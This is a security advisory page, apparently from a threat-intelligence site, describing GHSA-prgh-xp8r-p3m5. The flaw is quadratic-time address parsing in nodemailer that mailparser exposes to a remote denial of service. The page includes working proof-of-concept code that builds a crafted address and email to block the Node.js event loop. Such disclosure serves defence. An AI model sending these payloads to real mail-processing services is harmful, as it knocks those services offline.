highCVSS 7.5Vulnerability

GHSA-prgh-xp8r-p3m5

### Summary `nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail. ### Details The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string. The join check in `src/addressparser/index.ts`: ```js const joins = prevToken && prevToken.noBreak && parts.length && (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@'); ``` The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance. The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time. ### PoC Isolated, just the parser (`npm i [email protected]`): ```js const addressparser = require('nodemailer/lib/addressparser'); const s = Date.now(); addressparser('a' + '@b(c)'.repeat(130000)); console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking ``` End to end through mailparser, the remote path (`npm i [email protected]`): ```js const { simpleParser } = require('mailparser'); (async () => { const to = 'a' + '@b(c)'.repeat(130000); const eml = `From: [email protected]\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`; const s = Date.now(); await simpleParser(eml); console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking })(); ``` Timings measured on 10.0.3: | Add

Properties

severity
high
summary
Nodemailer addressparser: O(n^2) on comment-joined addresses enables a remote DoS (reachable via mailparser)
cvss_score
7.5
retrieved_at
2026-09-30T14:48:09+00:00
ghsa_published
2026-09-30T14:41:01Z
source_url
https://github.com/advisories/GHSA-prgh-xp8r-p3m5
ghsa_updated
2026-09-30T14:41:04Z
ghsa_id
GHSA-prgh-xp8r-p3m5
last_source
GitHub Advisory Database
cve_id
GHSA-prgh-xp8r-p3m5
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
signal_observed_at
2026-09-30T14:48:09+00:00
is_ghsa_only
true

Related Entities (5)

VULNERABLE_TO (1)

←[Software]npm/nodemailer

AFFECTS (1)

→[Software]npm/nodemailer

HAS_WEAKNESS (2)

→[Weakness]Uncontrolled Resource Consumption
→[Weakness]Inefficient Algorithmic Complexity

REPORTED_BY (1)

→[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

GHSA-prgh-xp8r-p3m5 (CVSS 7.5) — Ninja Signal Threat Intelligence | Ninja Signal